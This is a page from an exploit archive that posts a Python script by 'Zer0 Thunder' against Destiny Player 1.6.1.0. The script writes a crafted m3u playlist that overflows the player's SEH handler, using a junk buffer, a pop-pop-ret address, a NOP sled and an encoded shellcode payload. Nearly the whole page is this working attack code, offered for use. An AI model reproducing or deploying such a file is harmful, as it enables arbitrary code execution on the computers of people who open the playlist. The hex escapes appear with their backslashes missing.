Home / exploitsPDF  

Destiny Player 1.6.1.0 Buffer Overflow

Posted on 05 July 2011

print " ||=============================================================||"
print " ||                                                             ||"
print " ||      /          0-Exploit (Zer0 Thunder)                   ||"
print " ||       ,,  /  /--------------------------------------------||"
print " ||    '-.`()/`.-'          ===========================        ||"
print " ||   .--_'(  )'_--.          Destiny Player v1.6.1.0           ||"
print " ||  / /` /`**` `         SEH Buffer OverFlow (m3u)          ||"
print " ||   |  |  ><  |  |                                            ||"
print " ||           /  /                                            ||"
print " ||       '.__.'                                                ||"
print " ||                                                             ||"
print " ||=============================================================||"
filename = "des.m3u"
header ="x44x65x73x74x69x6ex79x50x6cx61x79x4cx69x73x74x20x30x30x30x30x30x30x30x30
"
header +="x23x45x58x54x4dx33x55
"
header +="x23x45x58x54x49x4ex46x3ax30x2c
"
junk = "x41" * 5292

nseh = "xebx06x90x90"
se = "x25x12xd1x72" #0x72d11225 pop edi; pop esi; retn 0x000c
nops ="x90" * 20
shellcode=("xdaxc1xd9x74x24xf4x5ax4ax4ax4ax4ax43x43x43x43"
"x43x43x43x52x59x56x54x58x33x30x56x58x34x41x50"
"x30x41x33x48x48x30x41x30x30x41x42x41x41x42x54"
"x41x41x51x32x41x42x32x42x42x30x42x42x58x50x38"
"x41x43x4ax4ax49x4bx4cx5ax48x4dx59x43x30x43x30"
"x43x30x43x50x4bx39x4bx55x56x51x58x52x52x44x4c"
"x4bx50x52x56x50x4cx4bx56x32x54x4cx4cx4bx56x32"
"x45x44x4cx4bx52x52x47x58x54x4fx4ex57x50x4ax56"
"x46x50x31x4bx4fx50x31x49x50x4ex4cx47x4cx45x31"
"x43x4cx54x42x56x4cx47x50x4fx31x58x4fx54x4dx43"
"x31x4fx37x4dx32x5ax50x56x32x51x47x4cx4bx56x32"
"x54x50x4cx4bx51x52x47x4cx43x31x4ex30x4cx4bx47"
"x30x54x38x4dx55x49x50x43x44x51x5ax45x51x4ex30"
"x56x30x4cx4bx51x58x54x58x4cx4bx56x38x47x50x43"
"x31x58x53x5ax43x47x4cx47x39x4cx4bx47x44x4cx4b"
"x43x31x58x56x50x31x4bx4fx50x31x49x50x4ex4cx49"
"x51x58x4fx54x4dx45x51x58x47x47x48x4dx30x52x55"
"x4bx44x45x53x43x4dx5ax58x47x4bx43x4dx47x54x52"
"x55x5ax42x50x58x4cx4bx51x48x51x34x43x31x49x43"
"x52x46x4cx4bx54x4cx50x4bx4cx4bx51x48x45x4cx45"
"x51x58x53x4cx4bx45x54x4cx4bx43x31x58x50x4dx59"
"x47x34x51x34x47x54x51x4bx51x4bx45x31x51x49x51"
"x4ax56x31x4bx4fx4dx30x50x58x51x4fx51x4ax4cx4b"
"x45x42x5ax4bx4cx46x51x4dx52x4ax43x31x4cx4dx4d"
"x55x4ex59x43x30x45x50x45x50x56x30x52x48x56x51"
"x4cx4bx52x4fx4cx47x4bx4fx49x45x4fx4bx5ax50x4f"
"x45x49x32x50x56x45x38x4fx56x5ax35x4fx4dx4dx4d"
"x4bx4fx4ex35x47x4cx45x56x43x4cx45x5ax4dx50x4b"
"x4bx4dx30x52x55x45x55x4fx4bx51x57x52x33x52x52"
"x52x4fx52x4ax43x30x56x33x4bx4fx4ex35x45x33x45"
"x31x52x4cx52x43x56x4ex45x35x54x38x43x55x43x30"
"x41x41")
junk2 = "x44" * (10000-len(header+junk+nseh+se+nops+shellcode))

payload = header+junk+nseh+se+nops+shellcode+junk2
textfile = open(filename , 'w')
textfile.write(payload)

print "

[+] File "+filename+" has been created"
textfile.close()

#E-mail : neonwarlock@live.com
#Blog/Site : zt-security.net
# Sri Lankan Hackers

 

TOP

Malware :

Exploits :